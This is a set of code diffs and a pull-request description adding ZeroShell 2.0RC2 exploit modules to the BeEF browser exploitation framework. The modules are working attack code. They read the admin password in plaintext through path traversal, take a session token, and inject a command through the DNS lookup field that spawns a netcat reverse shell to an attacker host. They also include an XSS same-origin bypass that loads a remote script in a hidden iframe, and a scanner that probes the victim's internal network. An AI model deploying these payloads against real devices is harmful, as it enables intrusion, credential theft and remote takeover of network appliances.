+		if(response1.status_code == 200){
+			pwd = response1.response_body.trim();
+			beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd);
+			beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { Action: "StartSessionSubmit", User: "admin", PW: pwd }, 10, 'script', false, null, function(response2){
+				if(response2.status_code == 200){
+					token = response2.response_body.substr(response2.response_body.indexOf("STk=")+4, 40);
+					beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token);
+					beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { 
+						Action: "Lookup",
+						Section: "DNS",
+						DNS: "localhost",
+						STk: token,
+						What: payload 
+						}, 10, 'script', false, null, function(response3){
+							beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse shell should have been triggered.");
+						}
+					);
+				} else {
+					beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed.");
+				}
+			});
+		} else {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed.");
+		}
+	});
+});
+

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/command.js
@@ -17,14 +17,17 @@ beef.execute(function() {
 	var token = "";
 	var payload = 'beef" localhost && rm -f /tmp/x;mkfifo /tmp/x;cat /tmp/x|/bin/sh -i 2>&1|nc ' + lhost + ' ' + lport + ' > /tmp/x #';
 
+	beef.debug("[ZeroShell_2.0RC2_reverse_shell_csrf_sop] Trying to retrieve admin password in plaintext: " + uripwd);
 	beef.net.forge_request("http", "GET", rhost, rport, uripwd, null, null, null, 10, 'script', true, null, function(response1){
 		if(response1.status_code == 200){
 			pwd = response1.response_body.trim();
 			beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd, beef.are.status_success());
+			beef.debug("[ZeroShell_2.0RC2_reverse_shell_csrf_sop] Trying to authenticate admin user to gain dynamic token with password: " + pwd);
 			beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { Action: "StartSessionSubmit", User: "admin", PW: pwd }, 10, 'script', false, null, function(response2){
 				if(response2.status_code == 200){
 					token = response2.response_body.substr(response2.response_body.indexOf("STk=")+4, 40);
 					beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token, beef.are.status_success());
+					beef.debug("[ZeroShell_2.0RC2_reverse_shell_csrf_sop] Trying to spawn a reverse-shell via CSRF in ZeroShell SOP context.");
 					beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { 
 						Action: "Lookup",
 						Section: "DNS",

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/command.js
@@ -5,7 +5,7 @@
 //
 
 beef.execute(function() {
-	var rhost = '<%= @rhost %>'; 
+	var rhost = '<%= @rhost %>';
 	var rport = '<%= @rport %>';
 	var lhost = '<%= @lhost %>';
 	var lport = '<%= @lport %>';
@@ -20,27 +20,27 @@ beef.execute(function() {
 	beef.net.forge_request("http", "GET", rhost, rport, uripwd, null, null, null, 10, 'script', true, null, function(response1){
 		if(response1.status_code == 200){
 			pwd = response1.response_body.trim();
-			beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd);
+			beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd, beef.are.status_success());
 			beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { Action: "StartSessionSubmit", User: "admin", PW: pwd }, 10, 'script', false, null, function(response2){
 				if(response2.status_code == 200){
 					token = response2.response_body.substr(response2.response_body.indexOf("STk=")+4, 40);
-					beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token);
+					beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token, beef.are.status_success());
 					beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { 
 						Action: "Lookup",
 						Section: "DNS",
 						DNS: "localhost",
 						STk: token,
-						What: payload 
+						What: payload
 						}, 10, 'script', false, null, function(response3){
-							beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse shell should have been triggered.");
+							beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse shell should have been triggered.", beef.are.status_unknown());
 						}
 					);
 				} else {
-					beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed.");
+					beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed.", beef.are.status_error());
 				}
 			});
 		} else {
-			beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed.");
+			beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed.", beef.are.status_error());
 		}
 	});
 });

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/config.yaml
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/config.yaml
@@ -1,0 +1,15 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        zeroshell_2_0rc2_reverse_shell_csrf_sop:
+            enable: true
+            category: ["Exploits", "ZeroShell"]
+            name: "ZeroShell <= 2.0RC2 Reverse Shell CSRF SOP"
+            description: "Attempts to get a reverse shell on a ZeroShell <= 2.0RC2 without known credentials<br />This module works only when the hook is on ZeroShell, please migrate to the ZeroShell target before using it ; or use the ZeroShell SOP-bypass module.<br />Vulnerability found and PoC provided by Yann CAM <a href='http://www.asafety.fr' target='_blank'>@ASafety</a> / <a href='http://www.synetis.com' target='_blank'>Synetis</a>.<br />BeEF module originally created by ycam.<br />For more information refer to <a href='http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt' target='_blank'>http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt</a><br />Patched in version 2.0RC3.<br />"
+            authors: ["ycam"]
+            target:
+                working: ["ALL"]

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/module.rb
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/module.rb
@@ -1,0 +1,23 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Zeroshell_2_0rc2_reverse_shell_csrf_sop < BeEF::Core::Command
+	def self.options
+		configuration = BeEF::Core::Configuration.instance
+		lhost = "#{configuration.get("beef.http.host")}"
+		lhost = "" if lhost == "0.0.0.0"
+		return [
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, 
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
+			{ 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost},
+			{ 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js
@@ -9,9 +9,9 @@ beef.execute(function() {
 	var rport = '<%= @rport %>';
 	var lhost = '<%= @lhost %>';
 	var lport = '<%= @lport %>';
-	var hookuri = '<%= @hookuri %>';
+	var hook = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + "/x.js";
 
-	var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x<script src='" + hookuri + "'></script>#lhost=" + lhost + "&lport=" + lport;
+	var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x<script src='" + hook + "'></script>#lhost=" + lhost + "&lport=" + lport;
 	var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
 	iframe_<%= @command_id %>.setAttribute('src', target);
 

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js
@@ -12,6 +12,8 @@ beef.execute(function() {
 	var hook = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + "/x.js";
 
 	var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x<script src='" + hook + "'></script>#lhost=" + lhost + "&lport=" + lport;
+
+	beef.debug("[ZeroShell_2.0RC2_reverse_shell_csrf_sop_bypass] Trying to spawn a reverse-shell via XSS/CSRF in ZeroShell with SOP bypass.");
 	var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
 	iframe_<%= @command_id %>.setAttribute('src', target);
 

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js
@@ -5,7 +5,7 @@
 //
 
 beef.execute(function() {
-	var rhost = '<%= @rhost %>'; 
+	var rhost = '<%= @rhost %>';
 	var rport = '<%= @rport %>';
 	var lhost = '<%= @lhost %>';
 	var lport = '<%= @lport %>';
@@ -15,5 +15,5 @@ beef.execute(function() {
 	var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
 	iframe_<%= @command_id %>.setAttribute('src', target);
 
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=OK: Reverse shell should have been triggered.");
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=OK: Reverse shell should have been triggered.", beef.are.status_unknown());
 });

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js
@@ -1,0 +1,19 @@
+//
+// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+	var rhost = '<%= @rhost %>'; 
+	var rport = '<%= @rport %>';
+	var lhost = '<%= @lhost %>';
+	var lport = '<%= @lport %>';
+	var hookuri = '<%= @hookuri %>';
+
+	var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x<script src='" + hookuri + "'></script>#lhost=" + lhost + "&lport=" + lport;
+	var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+	iframe_<%= @command_id %>.setAttribute('src', target);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=OK: Reverse shell should have been triggered.");
+});

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/config.yaml
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/config.yaml
@@ -1,0 +1,15 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass:
+            enable: true
+            category: ["Exploits", "ZeroShell"]
+            name: "ZeroShell <= 2.0RC2 Reverse Shell CSRF SOP Bypass"
+            description: "Attempts to get a reverse shell on a ZeroShell <= 2.0RC2 without known credentials<br />This module bypass SOP, so you can use it from another hooked domain.<br />Vulnerability found and PoC provided by Yann CAM <a href='http://www.asafety.fr' target='_blank'>@ASafety</a> / <a href='http://www.synetis.com' target='_blank'>Synetis</a>.<br />BeEF module originally created by ycam.<br />For more information refer to <a href='http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt' target='_blank'>http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt</a><br />Patched in version 2.0RC3.<br />"
+            authors: ["ycam"]
+            target:
+                working: ["FF"]

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/module.rb
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/module.rb
@@ -1,0 +1,30 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass < BeEF::Core::Command
+	def pre_send
+		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/x.js', '/x', 'js')
+	end
+	
+	def self.options
+		configuration = BeEF::Core::Configuration.instance
+		lhost = "#{configuration.get("beef.http.host")}"
+		lhost = "" if lhost == "0.0.0.0"
+		hookuri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/x.js"
+		return [
+			{ 'name' => 'hookuri', 'ui_label' => 'URL', 'type' => 'text', 'width' => '400px', 'value' => hookuri},
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, 
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
+			{ 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost},
+			{ 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444'}
+		]
+	end
+
+	def post_execute
+		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('x.js')
+		save({'result' => @datastore['result']})
+	end
+
+end

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/module.rb
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/module.rb
@@ -12,9 +12,7 @@ class Zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass < BeEF::Core::Command
 		configuration = BeEF::Core::Configuration.instance
 		lhost = "#{configuration.get("beef.http.host")}"
 		lhost = "" if lhost == "0.0.0.0"
-		hookuri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/x.js"
 		return [
-			{ 'name' => 'hookuri', 'ui_label' => 'URL', 'type' => 'text', 'width' => '400px', 'value' => hookuri},
 			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, 
 			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
 			{ 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost},

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/x.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/x.js
@@ -1,0 +1,47 @@
+var h=document.getElementsByTagName('head')[0];
+var j=document.createElement('script');
+j.src='http://code.jquery.com/jquery-latest.min.js';
+h.appendChild(j);
+
+var pwd="";
+var token="";
+
+var hash = window.location.hash.substring(1);
+var lhost = hash.substring(hash.indexOf("lhost=")+6, hash.indexOf("&"));
+var lport = hash.substring(hash.indexOf("lport=")+6, hash.length);
+
+var payload='beef%22+localhost+%26%26+rm+-f+%2Ftmp%2Fx%3Bmkfifo+%2Ftmp%2Fx%3Bcat+%2Ftmp%2Fx%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+' + lhost + '+' + lport + '+%3E+%2Ftmp%2Fx+%23';
+
+setTimeout(function (){
+	// first AJAX call in ZeroShell context to retieve the console admin password in plaintext
+	$.ajax({ 
+		type: 'GET',
+		url: "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw",
+		contentType: 'application/x-www-form-urlencoded;charset=utf-8',
+		success: function(result){
+			pwd = result.trim();
+			if(pwd != ""){
+				// second AJAX call in ZeroShell context to make a valid authentication with login "admin" and the password previously retrived
+				$.ajax({ 
+					type: 'POST',
+					url: "/cgi-bin/kerbynet",
+					contentType: 'application/x-www-form-urlencoded;charset=utf-8',
+					dataType: 'text',
+					data: 'Action=StartSessionSubmit&User=admin&PW='+pwd,
+					success: function(result){
+						// extract the current session token from the authentication performed
+						token = result.substr(result.indexOf("STk=")+4, 40); 
+						// third AJAX call in ZeroShell context to spawn a reverse-shell with the right session token
+						$.ajax({ 
+							type: 'POST',
+							url: "/cgi-bin/kerbynet",
+							contentType: 'application/x-www-form-urlencoded;charset=utf-8',
+							dataType: 'text',
+							data: 'Action=Lookup&STk='+token+'&Section=DNS&What='+payload+'&DNS=localhost'
+						});
+					}
+				});
+			}
+		}
+	});
+}, 5000);

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/command.js
@@ -81,6 +81,7 @@ beef.execute(function() {
 	scan = function(){
 		var i = 0; // Counter compared to IP bloc size
 		var ip_from_long_bloc = ip_from_long; // Save the begining IPv4 address for the current bloc
+		beef.debug("[ZeroShell_2.0RC2_scanner] Scan the subnet block from " + long2ip(ip_from_long) + " to " + long2ip(ip_to_long) + ".");
 		while((ip_from_long <= ip_to_long) && (i < ip_bloc)){
 			var img = document.createElement('img');
 			var ip = long2ip(ip_from_long);

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/command.js
@@ -1,0 +1,115 @@
+//
+// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+var imgPath 	= "/kerbynet/Zeroshell.gif";		// fingerprint img to detect a ZeroShell instance
+var ip_start 	= '<%= @ip_start %>'; 			// IP start range
+var ip_end 	= '<%= @ip_end %>';			// IP end range
+var timeout 	= '<%= @timeout %>';			// Timeout in ms to wait beetween each bloc scan and results sent to BeEF C&C (default 30000ms)
+var ip_bloc 	= '<%= @ip_bloc %>';			// Size of each IP bloc to scan (default 100)
+
+// Function added to convert string IPv4 to long
+function ip2long(IP) {
+  //  discuss at: http://phpjs.org/functions/ip2long/
+  //  original by: Waldo Malqui Silva (http://waldo.malqui.info)
+  //  improved by: Victor
+  //  revised by: fearphage (http://http/my.opera.com/fearphage/)
+  //  revised by: Theriault
+  //   example 1: ip2long('192.0.34.166');
+  //   returns 1: 3221234342
+  //   example 2: ip2long('0.0xABCDEF');
+  //   returns 2: 11259375
+  //   example 3: ip2long('255.255.255.256');
+  //   returns 3: false
+
+  var i = 0;
+  // PHP allows decimal, octal, and hexadecimal IP components.
+  // PHP allows between 1 (e.g. 127) to 4 (e.g 127.0.0.1) components.
+  IP = IP.match(
+    /^([1-9]\d*|0[0-7]*|0x[\da-f]+)(?:\.([1-9]\d*|0[0-7]*|0x[\da-f]+))?(?:\.([1-9]\d*|0[0-7]*|0x[\da-f]+))?(?:\.([1-9]\d*|0[0-7]*|0x[\da-f]+))?$/i
+  ); // Verify IP format.
+  if (!IP) {
+    // Invalid format.
+    return false;
+  }
+  // Reuse IP variable for component counter.
+  IP[0] = 0;
+  for (i = 1; i < 5; i += 1) {
+    IP[0] += !! ((IP[i] || '')
+      .length);
+    IP[i] = parseInt(IP[i]) || 0;
+  }
+  // Continue to use IP for overflow values.
+  // PHP does not allow any component to overflow.
+  IP.push(256, 256, 256, 256);
+  // Recalculate overflow of last component supplied to make up for missing components.
+  IP[4 + IP[0]] *= Math.pow(256, 4 - IP[0]);
+  if (IP[1] >= IP[5] || IP[2] >= IP[6] || IP[3] >= IP[7] || IP[4] >= IP[8]) {
+    return false;
+  }
+  return IP[1] * (IP[0] === 1 || 16777216) + IP[2] * (IP[0] <= 2 || 65536) + IP[3] * (IP[0] <= 3 || 256) + IP[4] * 1;
+}
+
+// Function added to convert long to string IPv4
+function long2ip(ip) {
+  //  discuss at: http://phpjs.org/functions/long2ip/
+  //  original by: Waldo Malqui Silva (http://waldo.malqui.info)
+  //   example 1: long2ip( 3221234342 );
+  //   returns 1: '192.0.34.166'
+  if (!isFinite(ip))
+    return false;
+  return [ip >>> 24, ip >>> 16 & 0xFF, ip >>> 8 & 0xFF, ip & 0xFF].join('.');
+}
+
+var ip_from_long 	= ip2long(ip_start); 	// Convert string IPv4 start range to long
+var ip_to_long 		= ip2long(ip_end);		// Convert string IPv4 end range to long
+
+beef.execute(function() {
+	var result 	= ""; // Buffer to retrieve results
+	var div 	= document.createElement('div'); // Hidden div container
+	div.setAttribute('style', 'display:none;');
+	document.body.appendChild(div);
+	
+	add = function(data){
+		result += data + " ";
+	}
+	
+	// Scan function to inject <img> markups in victim's DOM.
+	// This function is recalled by herself to scan each IP bloc of the IP range defined
+	scan = function(){
+		var i = 0; // Counter compared to IP bloc size
+		var ip_from_long_bloc = ip_from_long; // Save the begining IPv4 address for the current bloc
+		while((ip_from_long <= ip_to_long) && (i < ip_bloc)){
+			var img = document.createElement('img');
+			var ip = long2ip(ip_from_long);
+			img.setAttribute('src', "http://" + ip + imgPath); 	// Payload to detect ZeroShell instance
+			img.setAttribute('onload', "add('" + ip + "');");	// Event triggered of ZeroShell is detected
+			div.appendChild(img); // Add current <img> markup to the hidden div in the victim's DOM
+			ip_from_long++; // Increment long IPv4
+			i++;
+		}
+		var ip_to_long_bloc = ip_from_long; // Save the ending IPv4 address for the current bloc
+		
+		// Function to return results of the current bloc scanned to BeEF C&C, after "timeout" ms waited.
+		getResult = function(){
+			if(result.trim() != "")
+				beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] ZeroShell(s) detected : [ " + result + "]");
+			else
+				beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] No ZeroShell detected on that IP range bloc...");
+			div.innerHTML = ""; // Clean the current DOM's div
+			result = ""; // Clear the result of the bloc tested for the next loop
+		}
+		setTimeout("getResult()", timeout); // Wait "timeout" ms before sending results to BeEF C&C of the current bloc.
+		if(ip_from_long <= ip_to_long) // While we don't have test all IPv4 in the range
+			setTimeout("scan()", timeout*1.5); // Re-call the scan() function to proceed with the next bloc
+		else // We have reach the last IP address to scan
+			setTimeout(function(){ // Clear the victim's DOM and tell to BeEF C&C that the scan is complete
+				document.body.removeChild(div);
+				beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Scan is complete on the defined range [" + ip_start + " - " + ip_end + "] (DOM cleared)");
+			}, timeout*2);
+	}
+	
+	scan(); // Run the first bloc scan
+});

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/command.js
@@ -71,11 +71,11 @@ beef.execute(function() {
 	var div 	= document.createElement('div'); // Hidden div container
 	div.setAttribute('style', 'display:none;');
 	document.body.appendChild(div);
-	
+
 	add = function(data){
 		result += data + " ";
 	}
-	
+
 	// Scan function to inject <img> markups in victim's DOM.
 	// This function is recalled by herself to scan each IP bloc of the IP range defined
 	scan = function(){
@@ -91,13 +91,13 @@ beef.execute(function() {
 			i++;
 		}
 		var ip_to_long_bloc = ip_from_long; // Save the ending IPv4 address for the current bloc
-		
+
 		// Function to return results of the current bloc scanned to BeEF C&C, after "timeout" ms waited.
 		getResult = function(){
 			if(result.trim() != "")
-				beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] ZeroShell(s) detected : [ " + result + "]");
+				beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] ZeroShell(s) detected : [ " + result + "]", beef.are.status_success());
 			else
-				beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] No ZeroShell detected on that IP range bloc...");
+				beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] No ZeroShell detected on that IP range bloc...", beef.are.status_unknown());
 			div.innerHTML = ""; // Clean the current DOM's div
 			result = ""; // Clear the result of the bloc tested for the next loop
 		}
@@ -107,9 +107,9 @@ beef.execute(function() {
 		else // We have reach the last IP address to scan
 			setTimeout(function(){ // Clear the victim's DOM and tell to BeEF C&C that the scan is complete
 				document.body.removeChild(div);
-				beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Scan is complete on the defined range [" + ip_start + " - " + ip_end + "] (DOM cleared)");
+				beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Scan is complete on the defined range [" + ip_start + " - " + ip_end + "] (DOM cleared)", beef.are.status_success());
 			}, timeout*2);
 	}
-	
+
 	scan(); // Run the first bloc scan
 });

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/config.yaml
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/config.yaml
@@ -1,0 +1,15 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        zeroshell_2_0rc2_scanner:
+            enable: true
+            category: ["Exploits", "ZeroShell"]
+            name: "ZeroShell <= 2.0RC2 Scanner"
+            description: "Attempts to scan and detect ZeroShell <= 2.0RC2 instance over the victim's network.<br />Vulnerability found and PoC provided by Yann CAM <a href='http://www.asafety.fr' target='_blank'>@ASafety</a> / <a href='http://www.synetis.com' target='_blank'>Synetis</a>.<br />BeEF module originally created by ycam.<br />For more information refer to <a href='http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt' target='_blank'>http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt</a><br />Patched in version 2.0RC3.<br />"
+            authors: ["ycam"]
+            target:
+                working: ["All"]

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/module.rb
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/module.rb
@@ -1,0 +1,21 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Zeroshell_2_0rc2_scanner < BeEF::Core::Command
+
+	def self.options
+		return [
+			{ 'name' => 'ip_start', 'ui_label' => 'From IP', 'value' => '192.168.0.1'}, 
+			{ 'name' => 'ip_end', 'ui_label' => 'To IP', 'value' => '192.168.0.254' },
+			{ 'name' => 'timeout', 'ui_label' => 'Get result in (ms)', 'value' => '30000'},
+			{ 'name' => 'ip_bloc', 'ui_label' => 'Scan per bloc (ip)', 'value' => '100'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

--- a/modules/network/internal_network_fingerprinting/command.js
+++ b/modules/network/internal_network_fingerprinting/command.js
@@ -262,7 +262,11 @@ beef.execute(function() {
     "80","http",false,
     "/logo.gif",150,47),
   new Array("SMC Router","80","http",false,"/images/logo.gif",133,59),
-  new Array("ntop","3000","http",false,"/ntop_logo.png",103,50)
+  new Array("ntop","3000","http",false,"/ntop_logo.png",103,50),
+  new Array(
+	"ZeroShell",
+	"80","http",false,
+	"/kerbynet/Zeroshell.gif",180,63)
 
 // Uncommon signatures
 //new Array("Microsoft ADFS","80","http",false,"/adfs/portal/illustration/illustration.png",1420,1080),


### PR DESCRIPTION
Adding ZeroShell 2.0RC2 modules to BeEF
(RCE / Password and token disclosure) - Update Internal Network fingerprinting

To see a demonstration of these modules, please check this private video here : https://www.youtube.com/watch?v=6Jk0QyPG3fU

These modules are based on my previous advisory here : https://packetstormsecurity.com/files/122799/ZeroShell-2.0RC2-File-Disclosure-Command-Execution.html